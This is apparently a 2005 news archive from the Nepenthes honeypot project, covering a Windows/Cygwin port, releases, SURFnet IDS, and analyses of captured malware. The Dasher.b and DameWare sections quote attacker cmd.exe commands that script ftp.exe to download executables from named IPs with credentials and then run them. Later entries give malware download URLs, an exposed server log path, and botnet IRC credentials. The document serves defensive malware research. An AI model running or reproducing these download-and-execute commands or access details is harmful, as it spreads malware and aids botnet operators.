Nepenthes News Archive for 2005

I don’t think somebody will disagree when I say windows makes a pretty good honeypot, even when you run it on latest patchlevel, and there is no known flaw to exploit, there is still the user left.
As running this high interaction honeypot microsoft ships can consume a pretty large amount of time, as malware development makes it pretty hard to track the bad things happening on a windows box, and you can never be sure it really clean, we were asked to offer a windows version of nepenthes. My initial response was people running windows got other problems than running a honeypot, and i really dislike whatever http://msdn.microsoft.com offers as documentation, man pages are superior. And the whole networking in windows is pretty screwd, it does not offer poll(), you have to use the select() they offer, windows FD_SET() will compare the fd to set with every fd in the fdset to check if its the same, so you reach a n! runtime just for adding your n sockets to the fd_set.
The ‘native’ way in windows is meant to be WaitForSingleObject(), but as WaitForSingleObject() can only handle 64 objects, I’m asking myself what to use when you expect more than 64 objects to wait for, official version is to use WaitForSingleObject() in every thread, so you can wait for 64 objects per thread. Pretty bad I dont like threads, as threaded apps make debugging nearly impossible, and the other hand is threads are not that portable, especially windows CreateThread(), and I did not want to write windows specific code i’ll never run myself, but I’d have to maintain.

So whats left? For my own satisfaction I have cygwin in my windows install, and after I installed autoconf, automake, curl-devel, pcre-devel and something for libmagic, i tried to compile Nepenthes on windows using cygwin.
I hit the wall during configure as i missed libadns and cygwin does not offer it, so I looked for a cygwin port for windows, found it, and went to compile and install it. It did not compile, as some headers were async to the source, but then I was able to install it and went on compiling Nepenthes. cygwin’s g++ compiler was pretty particular, I when a function expected an int as argument, I had to cast the int32_t to int so cygwin would not complain. The other main thing was cygwins g++ was very strict about included headers, when i included <arpa/inet.h> I had to include <sys/socket.h> too so it would not complain about undefined types in arpa/inet.h. Pretty easy changes, sure, but when the same problem occurs that often its easy to loose motivation really fast. After some hundreds spells and casts, and some dozens includes, I got what i was looking for, nepenthes.exe and every nepenthes module as dll. I opend the nepenthes.conf file with wordpad , and replaced “.so” with “.dll” and started nepenthes, did not work as cygwin dropen when accessing a strings .c_str() when the string had content ““.
As these occurences when the string had zero content where obviously forgotten when the modules were written, i added the content. The second startup worked, with some lacks, nepenthes was unable to bind the windows fun ports 139 and 445.
I loaded the x-6 module, to test if adns was working correctly, and found out it did not work anyway, as my cygwin missed /etc/resolv.conf, after adding the file resolving dns using adns worked in nepenthes.

So I crawled the web for a way to disable the funports in windows so nepenthes could use them instead. I found 2 projects who claimed to help me with that, http://www.dingens.org and http://www.ntsvcfg.de/ . The dingens.org thing did not work for me, I felt fooled when using it, and ntsvcfg.de’s batch file failed downloading a file from ftp.microsoft.com. I tried retrieving the file with wget, but did not help, seem’d like the ftp daemon microsoft uses did not like wget.

So I went plan b, and disabled every service which could be disabled in my windows by hand, in pure hope it would disable the service on the funports.

This did not work, it broke the windows the neck, as many things did not work when I was done disabling and restarted the box. Now it claims to lack any network interface, even though i got ip on the box and can access the internet. The famous internet explorer uses only a 3cm wide bar on the left side to render webpages, even as the explorer just uses a 3cm wide bar on the left. Some folders are without any content according to explorer, but i could access the files in these folders when i knew the path or used my cygwin.

So apart from breaking everything, nothing changed.

2 days later i just doubleclicked the ntsvcfg.de’s batch file, it worked ...I guess was a mistake trying to run the batch file in cygwin ...
The batchfile was successfull in downloading a zipped file from microsoft and an unpacker (pkunzip?) from some other page, and disabled the services on port 445 and 139 ( 135 is still used but i know howto disable it, but as mentioned before my whle networking is borked and so i cant change it for now)

Finally I can say it is possible to run nepenthes on windows.

After veryfing the changes won’t break something, we merged them to trunk, so the next release will compile on windows (in cygwin) without further tweaks.

We will update the readme so everybody is free to compile it on his own on cygwin.

Argos is a full and secure system emulator designed for use in Honeypots. 
It is based on QEMU, an open source processor emulator that uses dynamic translation to achieve a fairly good emulation speed.

List of features:
  * Emulation of x86 processors
  * Detects arbitrary control flow attacks
  * Detects arbitrary code execution attacks
  * OS agnostic (has been tested with Linux, Windows 2000, and Windows XP)
  * User/kernel memory mappings are handled
  * DMA is handled
  * Runs on 32b and 64b processors (hasn't been extensively tested on 64b)

( taken from http://www.few.vu.nl/~porto/argos/ )

We checked it out, installed it, and actually argos is a lot of fun.

If you want to try it yourself and never played with qemu before, we recommend you use the argos installation howto we compiled for our own usage, as the docs on the offcial page are rather incomplete.

We’re looking forward doing something usefull with argos, as it’s possibilites are quite unlimited, even in the first released version 0.1.

Have fun

As we expect the msdtc exploit getting more used during the next days, especially when a certain group of people has christmas holidays, and we did not want you itching around with libtool here is the full version.
No patches, no tears.

Make sure to read the release notes and get the Package If you overinstall on an existing installation, make sure to use the new nepenthes.conf and shellcode-generic config files.
You don’t need to upgrade if you forget loading the new module in nepenthes.conf, or dont use the new shellcodes in shellcode-generic.conf

The The Artemis Project (the chinese honeynet) has a nice summary to dasher.b for all those who want to get a little more information than the antivirus vendors offer.

Actually this is old news already, as mentioned on http://isc.sans.org and http://www.f-secure.com/weblog yesterday after Georg Wicherski from mwcollect was able to capture the first Dasher.b variant.

Upto now we captured 4 different commandprompt batchfiles downloading the plague.

All will download 2 files via ftp to your box. We changed the shellemulation to be able to run more than a single download per session

This is the first one from yesterday.

cd %TEMP%&echo open 159.226.153.2 21211>x&echo test>>x&echo test>>x&echo bin>>x&
echo get 0.exe>>x&echo get 1.exe>>x&echo bye>>x&
echo ftp.exe -s:x^&^&del x^&START 0.exe^&START 1.exe^&del x.bat>x.bat
cmd.exe /c x.bat

We had to add microsoft cmd.exe ^escaping to the commandprompt to get it running.

they changed the last line during the night to use START instead of cmd.exe

cd %TEMP%&echo open 159.226.153.2 21211>x&echo test>>x&echo test>>x&echo bin>>x&
echo get 0.exe>>x&echo get 1.exe>>x&echo bye>>x&
echo ftp.exe -s:x>x.bat&echo del x>>x.bat&echo START 0.exe>>x.bat&echo START 1.exe>>x.bat&echo exit>>x.bat
START /MIN x.bat

We had to add the “start” command to shell emulation to get this one working

( note we added linebreaks for better readability )

when the server was shut down they changed to this one

cd %TEMP%&echo open 218.5.79.82 21>x&echo dy456.com>>x&echo tghr0$8uty>>x&
echo cd images>>x&echo bin>>x&echo get 0.exe>>x&echo get 1.exe>>x&
echo bye>>x&echo ftp.exe -s:x>x.bat&echo del x>>x.bat&echo START 0.exe>>x.bat&
echo START 1.exe>>x.bat&echo exit>>x.bat
START /MIN x.bat

We had to add the “cd” command to the ftp.exe shell emulation to get this working.

and the 4th. hrm, lets say it so, we know it will trigger a download from

%%ftp://test:test@61.177.237.66:21211/{0,1}.exe%%

but as we run RingLogger for diskspace reasons, we just cant say how the url looks like.

Actually the ftp server is a little nervous about \r\n termination of ftp commands, and so nepenthes was not able to download a daim, once again we fixed it ...

nc 61.177.237.66 21211

220-___--->>>[E-v-i-l_S-e-c-u-r-i-t-y_T-e-a-m]<<<---___
220-______________________________________________
220-¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
220-This Server is running since 0 days and 2:13 hours,
220-and has been accessed 2799 times, 2804 in the last 24 hours.
220-There are now 28 users logged in, Max allowed : Unlimited.
220-______________________________________________
220-¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
220-Free Disk Space : 4501.14 MB
220-Downloaded : 14677 Kb in 465 Files
220-Uploaded : 63 Kb in 2 Files
220-Current Speed : 0.351 Kb/sec
220-Average Speed : 1.843 Kb/sec
220-______________________________________________
220 ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

nc 159.226.153.2 21211

220-___--->>>[E-v-i-l_S-e-c-u-r-i-t-y_T-e-a-m]<<<---___
220-______________________________________________
220-¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
220-This Server is running since 1 days and 13:18 hours,
220-and has been accessed 2950 times, 2572 in the last 24 hours.
220-There are now 3 users logged in, Max allowed : Unlimited.
220-______________________________________________
220-¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
220-Free Disk Space : 1981.84 MB
220-Downloaded : 125992 Kb in 5553 Files
220-Uploaded : 335 Kb in 14 Files
220-Current Speed : 0.000 Kb/sec
220-Average Speed : 0.941 Kb/sec
220-______________________________________________
220 ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

nc 218.5.79.82 21

220 Welcome to the FTP Server ...

We had the impression this ftp server is actually was installed on the box before they rooted it.

F-Secure has a small Dasher.b writeup you might want to read.

created with openoffice and http://www.virustotal.com

The Philippine Honeynet Projecthas some details scanning statistics, showing the outbreak was well planned. Currently they reached their bandwidth limit, as they got linked by http://isc.sans.org

Apart from the fact we appreciate the attackers help improving nepenthes by pointing out bugs, this looks like a well planed and still running operation to us.
The questionable files 0.exe and 1.exe are yet recognized by only some vendors, there is no real deep analysis yet, there is still a lot of work to do.
The dasher patchset we uploaded some hours ago turned out to be incomplete, it recognizes the exploit, but may fail downloading the samples, a new working revision of the diff is in process.

As a shellcode used a xor decoder nepenthes did not know, it was unrecognized. So I had a look myself and after adding the xor chain Nepenthes was able to download the file.

But some words about the file downloaded from http://rcb.medbod.com/seed/ftcn32a.exe. As it was only 6656 bytes in size, i simply ran strings on it, and voila:

strings /tmp/ftcn32a.exe

application
TEMP6534C64A-
Z454-122E-BF
-083C2  4S55
1'http://rc.medbod.com/seed/
nwaa32.exe

seem’d like the file was upto download another file from http://rc.medbod.com/seed/nwaa32.exe.
As domain rc.medbod.com could not be resolved, i tried rcb.medbod.com as used to download the previous file, and it worked. Obviously somebody mistyped the domain where to download the next stage in the ftcn32a.exe downloader.

nwaa32.exe has 48198 bytes size and as Im lazy i just threw it in normans sandbox, it turned out nwaa32.exe was about to download http://upseek.org/u/upd_0002.exe but the domain does not resolve any longer.

We’re sorry you have to update again, but it addresses 2 bugs and makes sure you don’t have to download and apply all the patches from the sf.net tracker. Get it from sourceforge, read the releasenotes and changelog,

enjoy it.

Luciano Bello got the first nepenthes debian packages on the road.
Currently they are not avalible in apt, no offical packages, but if you run debian and don’t want to spend your time compiling the source, you may want to check them out.

The packages contain the log path patch and and the xor & bindshell patch so you run latest software without fiddling on your own. You always can find differents (and latest) versions here.

http://www.lucianobello.com.ar/nepenthes/

Install is easy, download the .deb package of your choice

dpkg -i nepenthes-<version>.deb

will install the daemon, the config files, create the directories and run nepenthes via init script on each startup.

man nepenthes

will provide additional information.

In order to provide better readable analysis we rewrapped the help section, and split it up creating a new section for known Shellcodes. We reformatted quite all analysis results to improve readbility. Some shellcodes are new, some just got a major facelifting commenting more of the shellcodes itself.
If you want to help us on reversing unknown shellcodes get the dump, and post your results to nepenthes-devel.

apply this patch. At least if you run nepenthes 0.1.3 and do not use RingLogger.

The problem is, the logging path is read from config, but we still log after we destroyed the config on shutdown. So the files appear somewhere ... . Thanks to kaiowas from the gentoo team to note this, we never hit this bug as we prefer RingLogger.

To apply the patch

foo:/tmp/nepenthes-0.1.3# cat ../nepenthes-0.1.3_logger_path.diff | patch -p0
patching file nepenthes-core/include/FileLogger.hpp
patching file nepenthes-core/src/FileLogger.cpp
patching file nepenthes-core/src/RingFileLogger.cpp
foo:/tmp/nepenthes-0.1.3#

you can have a look on the patch here: http://phpfi.com/88462

I got a report somebody managed to compile & run nepenthes on

debian 3.1 on hppa-RISC/32: (100 MHz)

So

• checkout the Release Notes
• get your copy
• have fun installing it

and enjoy running it.

If you got problems, ask the mailing list.

By a fluke I hit
hexblog About IDA Pro, decompilation, programming, binary program analysis, information security. which is run by Ilfak Guilfanov.

And hexblog rocks, the current article is about automating conditinal breakpints, helping you to debug debugproof malware like ZOTOB.

A great blog, im really glad i know it, and hope they keep the good work up.

SURFnet High-qualitiy Internet for higher education and research
SURFnet connects the dutch networks of universities, colleges, research centres, academic hospitals and scientific libraries to one another and to other networks in Europe and the rest of the world.

You may want to have a look on their network structure.

Below you can see first screenshots of the SURFnet IDS webinterface.
The intrusion systems structure is really sexy, surfnet ids uses openvpn to route traffic from different network ranges to a central server running nepenthes. As they had some whishes in nepenthes logging, we sat together and created a module log-surfnet that logs the attacks and details to a postgres database.

The webinterface supports usergroups, and allows each user to see how poisend his own network is compared to others.

Click the images for full size, or visit http://ids.surfnet.nl/screenshots/ for more.

The surfnet ids projecthomage offers more information about the setup, so some short details as a teaser

• complete open source based
  • sensors
    • knoppix featuring openvpn
  • server
    • apache + php
    • postgres
    • nepenthes
    • rrdtool
• setting up a sensor is easy, just plug in the knoppix usb stick and boot it, it will create the required openvpn keys and set it up by itself
• includes webinterface to see whats going on
• one can search for activity on ranges like “12.23.41.32/21”
• easy to setup

Not to mention the log-surfnet nepenthes module will make it into the upcoming nepenthes release.

• SURFnet Home in english so you at least know whois surfnet
• SURFnet IDS Project Homepage
• Contact SURFnet IDS Developers

You can have a look on the doxygen documentation for the 0.1.3-rc1 on

http://nepenthes.sourceforge.net/nepenthes_core_doxy/html/

As the documentation for all modules is quite large (>60mb) the online documentation just includes the nepenthes-core and the example modules.
The doxygen file to create the docs for the whole source will be included in further releases.

have fun browsing it

Lets assume, somebody connected a box running nepenthes, tried to exploit the DameWare vulnerability with a known shellcode.

Socket TCP  (bind) 0.0.0.0:0 -> 0.0.0.0:6129
        DialogueFactory DameWare Dialogue Factory creates DWDialogues could Accept a Connection

Accepted Connection Socket TCP  (accept) 81.164.174.142:1092 -> xxx.xxx.xxx.xxx:6129

Detected connectback shellcode konstanzConnect, 81.164.174.142:10000

Nepenthes would try to connect the attacker and offer a shell.

Connecting xxx.xxx.xxx.xxx -> 81.164.174.142:10000

and would receive commands to download someting, but fail.

Handler ftp download handler will download ftp://Leech:NFe@69.134.194.126:1337/nofileyet 

we would have a look on the logfiles.

at first a dir was created, and the shell changed to that dir.

Line (38) is 'mkdir c:\windows\system32\dhcp\config
Line (28) is 'cd c:\windows\system32\dhcp

then the old echo game started and a file ccc.txt with content

'open 69.134.194.126 1337
Leech
NFe
hash
bin
prompt
mget *.*
bye
'

was created.

then the file was used as a scripted sequence for microsoft ftp client.

Line (15) is 'ftp -s:ccc.txt
...

file content is is
open 69.134.194.126 1337
Leech
NFe
hash
bin
prompt
mget *.*
bye

and here nepenthes failed to parse, as he does not know the required ‘mget’

Handler ftp download handler will download ftp://Leech:NFe@69.134.194.126:1337/nofileyet

then the shell session went on

Line (12) is 'usb2.exe /i
Line (15) is 'net start usb2
Line (33) is 'copy mw.txt c:\windows\system32\
Line (33) is 'copy mc.txt c:\windows\system32\
Line (12) is 'del ccc.txt

So ... lets have a look on the text files.

cat mw.txt

                               ''~``
                             ( o o )
+------------------.oooO--(_)--Oooo.-----------------
|                                                                |
|                   Hacked By LunaNluv           |
|                                                                |
|                     ooO                                    |
|                      (    )Ooo                             |
+----------- ---------\  ((     )------------------------------
                         \_)) /
                           (_/

______________________________________________
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
This Server is running since %ServerDays days and %ServerHours:%ServerMins hours,
and has been accessed %loggedInAll times, %u24h in the last 24 hours.
There are now %Unow users logged in, Max allowed : %MaxUsers.
______________________________________________
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Free Disk Space : %DFree MB
Downloaded : %ServerKbDown Kb in %ServerFilesDown Files
Uploaded : %ServerKbUp Kb in %ServerFilesUp Files
Current Speed : %ServerKBps Kb/sec
Average Speed : %ServerAvg Kb/sec
______________________________________________
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Do NOT rehack
Do NOT rescan this range
Do NOT abuse the server
Do NOT pass the IP & login to some-one else
Do NOT WHINE about everything
Do ENJOY this server
______________________________________________

cat mc.txt
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
  Free Disk Space : %DFree MB - Current Speed : %ServerKBps Kb/sec
________________________________________________ [ Luna ]

So a last look on the file ...

md5sum usb2.exe
b3ca5006f354f97afca15e14298e2681  usb2.exe

clamscan usb2.exe
usb2.exe: Trojan.Servu.1 FOUND

i’m still smiling about this poor guy who uses autorooters to tag ftpds, and we will think about adding mget to the VFS.

We just updated the Norman Sandbox Section, more than 200 new sandbox results got added, If you want to see whats new,

• section 11
• section 12

This section is with friendly permission of

We saw too many downloads from a static ftp daemon .. so we checked it out.

telnet nusphere.com.ar 21
Trying 67.15.122.25...
Connected to nusphere.com.ar.
Escape character is '^]'.
220---------- Welcome to Pure-FTPd [TLS] ----------
220-You are user number 12 of 50 allowed.
220-Local time is now 16:35. Server port: 21.
220-This is a private system - No anonymous login
220 You will be disconnected after 15 minutes of inactivity.
QUIT
221-Goodbye. You uploaded 0 and downloaded 0 kbytes.
221 Logout.

lftp
lftp fumado@nusphere.com.ar@nusphere.com.ar:/> set ftp:ssl-force off
lftp fumado@nusphere.com.ar@nusphere.com.ar:/> set ftp:ssl-allow off
lftp :~> open nusphere.com.ar
lftp nusphere.com.ar:~> user fumado@nusphere.com.ar
Passwort:

lftp fumado@nusphere.com.ar@nusphere.com.ar:/> ls
drwxr-xr-x    2 32110    nusphere     4096 Oct 26 19:10 .
drwxr-xr-x    2 32110    nusphere     4096 Oct 26 19:10 ..
-rw-------    1 32110    nusphere       11 Oct 26 19:10 .ftpquota
-rw-r--r--    1 32110    nusphere   107520 Sep 22 03:37 111.exe
-rw-r--r--    1 32110    nusphere   128000 Jul  1 04:56 MsConf.exe
-rw-r--r--    1 32110    nusphere    93008 Jul  1 04:56 MsSanSerif.exe
-rw-r--r--    1 32110    nusphere    79360 Jul  1 04:56 SabeDumps.exe
-rw-r--r--    1 32110    nusphere    96224 Jul  1 04:56 ServicesMsDos.exe
-rw-r--r--    1 32110    nusphere   109056 Jul  1 04:29 SistemscamzTray.exe
-rw-r--r--    1 32110    nusphere   109056 Jul  1 04:27 Ststema.exe
-rw-r--r--    1 32110    nusphere   107184 Jul  1 04:57 Ststema2.exe
-rw-r--r--    1 32110    nusphere   108544 Sep 19 21:45 aaa.exe
-rw-r--r--    1 32110    nusphere   119808 Sep 19 14:12 arse.exe
-rw-r--r--    1 32110    nusphere    92944 Jul  1 04:55 bt.exe
-rw-r--r--    1 32110    nusphere    42496 Sep 14 05:42 camara.exe
-rw-r--r--    1 32110    nusphere    86528 Jul  1 04:56 camiviejo.exe
-rw-r--r--    1 32110    nusphere   108544 Sep 19 13:46 dulcor.exe
-rw-r--r--    1 32110    nusphere        0 Sep 11 19:25 index.htm
-rw-r--r--    1 32110    nusphere    78848 Sep 22 14:22 mama.exe
-rw-r--r--    1 32110    nusphere   109056 Jul  1 04:36 memesystem.exe
-rw-r--r--    1 32110    nusphere    61952 Sep 18 21:26 merda.exe
-rw-r--r--    1 32110    nusphere    58880 Sep 16 20:00 moma.exe
-rw-r--r--    1 32110    nusphere   125440 Sep 16 12:36 mome.exe
-rw-r--r--    1 32110    nusphere    90112 Jul  1 04:56 mspad.exe
-rw-r--r--    1 32110    nusphere    60928 Jul  1 04:56 msplus32.exe
-rw-r--r--    1 32110    nusphere    79360 Jul  5 16:42 none.exe
-rw-r--r--    1 32110    nusphere    87808 Jul  1 04:56 ntc.exe
-rw-r--r--    1 32110    nusphere   123392 Jul 10 20:20 pad.exe
-rw-r--r--    1 32110    nusphere    49152 Jul  1 04:56 padoriginal.exe
-rw-r--r--    1 32110    nusphere   123392 Jul 10 20:43 regsvcs.exe
-rw-r--r--    1 32110    nusphere   108544 Jul  1 04:57 spooIs.exe
-rw-r--r--    1 32110    nusphere   108544 Jul 21 23:08 sysload.exe
-rw-r--r--    1 32110    nusphere    81408 Jul  1 04:57 taskMplus.exe
-rw-r--r--    1 32110    nusphere    80896 Jul  1 04:57 taskplus.exe
-rw-r--r--    1 32110    nusphere    37968 Sep 15 21:56 tkb.exe
-rw-r--r--    1 32110    nusphere    60416 Sep 11 21:59 undetected.exe
-rw-r--r--    1 32110    nusphere   100480 Jul  1 04:58 wincamz.exe
-rw-r--r--    1 32110    nusphere    93696 Jul 10 18:50 winstart.exe
-rw-r--r--    1 32110    nusphere   106512 Aug  8 21:23 wpad.exe
-rw-r--r--    1 32110    nusphere   106512 Aug  8 21:24 wspad.exe

lftp fumado@nusphere.com.ar@nusphere.com.ar:/> !mkdir nusphere.com.ar
lftp fumado@nusphere.com.ar@nusphere.com.ar:/> lcd nusphere.com.ar/
lcd OK, lokales cwd=/tmp/nusphere.com.ar
lftp fumado@nusphere.com.ar@nusphere.com.ar:/> mirror ./ ./
mirror: Zugriff nicht möglich: 550 Prohibited file name: .ftpquota
**** .ftpquota: Datei oder Verzeichnis nicht gefunden
Gesamt: 1 Verzeichnis, 38 Dateien, 0 Verknüpfungen
Neu: 38 Dateien, 0 Verknüpfungen
3321568 Bytes übertragen in 51 Sekunden (63.9K/s)
1 error detected

lftp fumado@nusphere.com.ar@nusphere.com.ar:/> exit

clamscan *
111.exe: OK
aaa.exe: OK
arse.exe: OK
bt.exe: OK
camara.exe: Worm.Mytob.HH FOUND
camiviejo.exe: Trojan.Mybot-2574 FOUND
dulcor.exe: OK
index.htm: Empty file
mama.exe: OK
memesystem.exe: OK
merda.exe: OK
moma.exe: OK
mome.exe: OK
MsConf.exe: OK
mspad.exe: OK
msplus32.exe: Worm.Mytob.CD FOUND
MsSanSerif.exe: OK
none.exe: OK
ntc.exe: Trojan.Wootbot-202 FOUND
pad.exe: Trojan.Mybot-2243 FOUND
padoriginal.exe: OK
regsvcs.exe: Trojan.Mybot-2243 FOUND
SabeDumps.exe: OK
ServicesMsDos.exe: OK
SistemscamzTray.exe: OK
spooIs.exe: OK
Ststema2.exe: OK
Ststema.exe: OK
sysload.exe: OK
taskMplus.exe: Trojan.Mybot-2196 FOUND
taskplus.exe: Trojan.Mybot-1701 FOUND
tkb.exe: Worm.Mytob.GE FOUND
undetected.exe: Exploit.DCOM.Gen FOUND
wincamz.exe: OK
winstart.exe: OK
wpad.exe: OK
wspad.exe: OK

----------- SCAN SUMMARY -----------
Known viruses: 40929
Engine version: 0.87
Scanned directories: 0
Scanned files: 36
Infected files: 10
Data scanned: 4.09 MB
Time: 2.866 sec (0 m 2 s)

really?

As we noticed we were going to face the same problem AV vendors faced for years, different names for same threats, we stopped bitching each other and the result is the Common Shellcode Naming Initiative, a subproject of mwcollect and Nepenthes to verify we use same names for same threats.

The main interest is to create a logging compatibilty for prelude and other logging solutions.

The mwcollect text to the issue.

It’s done

First v3 core based version, introduces the new shit and catches a whole bunch of malware. 
There is still stuff to be done better, so expect some future releases with enhanced featuresets as well. 
What will definitely come very soon is Prelude IDS support (v3.0.1)!

source: http://download.mwcollect.org/

If you want to check it out, visit http://www.mwcollect.org/ for more information.

As the host we mentioned before just got down, here is a new one, this time we can’t see the logsfiles for their ftpd, now we can have a look on the webalizer stats they create for their botnet.

This file ftp://aaa:*stripped for your own security*@ftp.dwslape.info:21/pload.exe with hash 5c6cffb4af116f7242e7c5892d3604cf spreads like a charm currently.

Some funny stuff you will like:

discussion how to setup an ircd to run the botnet
ftp://aaa:partin@ftp.dwslape.info/public_html/IRCSETUP.htm local mirror botnet_bricks_ircd_howto

their webalizer stats
ftp://aaa:partin@ftp.dwslape.info/tmp/webalizerftp/usage_200510.html local mirror botnet_bricks_webalizer_stats

the 3rd botnet brick this week, once again with webalizer stats for their ftp daemon

file is located on ftp://marybeth:*stripped*@ftp.gyfm.com:21//public_html/images/oaktree.jpg hash is 8812c6eeb9ab031d78c1eda89fb45588

ftp://marybeth:byteme@ftp.gyfm.com//tmp/webalizerftp/usage_200510.html local mirror webalizer stats

Currently a worm with filename CWM32.dll.exe and hash 2d6eab548d03dec514e5868fd6c24400 spreads really ... ‘good’

the worm uses ftp://connected:*stripped for your own security*@download.act1ol.com.ar:19091/CWM32.dll.exe to download itself, so the virus ‘authors’ dont have to care about writing a reliable working ftp daemon themselves.

for some reasons the proftpd installation there is ... lets say broken
you can browse the / tree, look at irc channel party picture galleries, and even look at the ftp daemons transferr logfile.

ftp://connected:-con-superpass-@download.act1ol.com.ar:19091/../../var/log/xferlog

grep CWM xferlog  | wc
  43695  786510 4612416

the file got downloaded 40.000 times during the last 4! days

grep CWM xferlog  | awk ' { print $7 } ' | sort | uniq | wc
  35329   35329  497602

by 35.000 different hosts

Filename: CWM32.dll.exe Hash: 2d6eab548d03dec514e5868fd6c24400

stats created with http://www.virustotal.com and openoffice

to complete the story of bad configured daemons ...

⇒ PASS <connect.superpass>
⇒ NICK [0]NL|3473273
⇒ USER john 0 0 :[0]NL|3473273
⇐ :C.new 001 [0]NL|3473273 :Welcome to the C1 IRC Network [0]NL|3473273!john@shady.ofthe.net
⇐ :C.new 002 [0]NL|3473273 :Your host is C.new, running version Unreal3.2
⇐ :C.new 003 [0]NL|3473273 :This server was created Mon Sep 12 2005 at 19:45:54 PDT
⇐ :C.new 004 [0]NL|3473273 C.new Unreal3.2 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeKVfMGCuzNT
⇐ :C.new 005 [0]NL|3473273 MAP KNOCK SAFELIST HCN MAXCHANNELS=10 MAXBANS=60 NICKLEN=30 TOPICLEN=307 KICKLEN=307 MAXTARGETS=20 AWAYLEN=307 :are supported by this server
⇐ :C.new 005 [0]NL|3473273 WALLCHOPS WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(ohv)@%+ CHANMODES=beqa,kfL,l,psmntirRcOAQKVGCuzNSMT NETWORK=C1 CASEMAPPING=ascii EXTBAN=~,cqr :are supported by this server
⇐ :C.new 251 [0]NL|3473273 :There are 3 users and 1443 invisible on 1 servers
⇐ :C.new 252 [0]NL|3473273 3 :operator(s) online
⇐ :C.new 253 [0]NL|3473273 3 :unknown connection(s)
⇐ :C.new 254 [0]NL|3473273 6 :channels formed
⇐ :C.new 255 [0]NL|3473273 :I have 1446 clients and 0 servers
⇒ USERHOST [0]NL|3473273
⇐ :C.new 265 [0]NL|3473273 :Current Local Users: 1446 Max: 3532
⇐ :C.new 266 [0]NL|3473273 :Current Global Users: 1446 Max: 3532
⇐ :C.new 422 [0]NL|3473273 :MOTD File is missing
⇐ :[0]NL|3473273 MODE [0]NL|3473273 :+iw
⇒ MODE [0]NL|3473273 -x+B
⇒ JOIN ##C-Scan##,##C-down1##,##C-down2## webbrowser
⇒ USERHOST [0]NL|3473273
⇒ MODE [0]NL|3473273 -x+B
⇒ JOIN ##C-Scan##,##C-down1##,##C-down2## webbrowser
⇒ USERHOST [0]NL|3473273
⇒ MODE [0]NL|3473273 -x+B
⇒ JOIN ##C-Scan##,##C-down1##,##C-down2## webbrowser
⇐ :C.new 302 [0]NL|3473273 :[0]NL|3473273=+john@shady.ofthe.net
⇐ :C.new NOTICE [0]NL|3473273 :BOTMOTD File not found
⇐ :[0]NL|3473273 MODE [0]NL|3473273 :+B
⇐ :[0]NL|3473273!john@shady.ofthe.net JOIN :##C-Scan##
⇐ :C.new 332 [0]NL|3473273 ##C-Scan## :.adv5c4n ndcass 100 3 0 -a -b -r -s
⇐ :C.new 333 [0]NL|3473273 ##C-Scan## h3 1130006326
⇐ :C.new 353 [0]NL|3473273 @ ##C-Scan## :[0]NL|3473273
⇐ :C.new 366 [0]NL|3473273 ##C-Scan## :End of /NAMES list.
⇐ :[0]NL|3473273!john@shady.ofthe.net JOIN :##C-down1##
⇐ :C.new 353 [0]NL|3473273 @ ##C-down1## :[0]NL|3473273
⇐ :C.new 366 [0]NL|3473273 ##C-down1## :End of /NAMES list.
⇐ :[0]NL|3473273!john@shady.ofthe.net JOIN :##C-down2##
⇐ :C.new 353 [0]NL|3473273 @ ##C-down2## :[0]NL|3473273
⇐ :C.new 366 [0]NL|3473273 ##C-down2## :End of /NAMES list.
⇐ :C.new 302 [0]NL|3473273 :[0]NL|3473273=+john@shady.ofthe.net
⇐ :C.new 302 [0]NL|3473273 :[0]NL|3473273=+john@shady.ofthe.net

in short, if you think the guys are lonley, want to chat with them, give them a shot on

server: connect.aktiol.com.ar
port: 65511 
pass: <connect.superpass>

channels: ##C-Scan##,##C-down1##,##C-down2##
with 
password: webbrowser

nice weekend ...

In order to put in more data, we flushed the maps database.
Now the map shows country and city, too.

check it here

And this shows the most active viri so far. clicking the hash will lead you to the norman sandbox analysis. we will provide realtime data soon.

We just updated the Virus Scanner Test and ... guess who improved his malware recognition signatures by almost 20%.

The Visualisation now uses real time data, and we are working on adding additional information (ip, city, country, countrycode,hash,virusname) to the map.

Even though we really please every user to donate their data to the official map, the upcoming nepenthes release will include a doc howto run such service on your own homepage.

dont get me wrong, libcurl is _great_, really. using curl its easy to down&upload files via http/ftp in just some lines code, without relying on system operating specific libraries.
but i will make the whole curl part optional, as i noted curl and nepenthes got .. lets say .. design differences.

the problem in short:

• curl does offer not a way to poll() the used sockets extern
  • even if curl would offer a way to extract the sockets it would be a pain to use them in the poll mainloop in nepenthes, as the number of sockets for ftp for example changes during a session.
• so we have to rely on the EventManager timeout, giving curl a chance to do what has to be done every second.
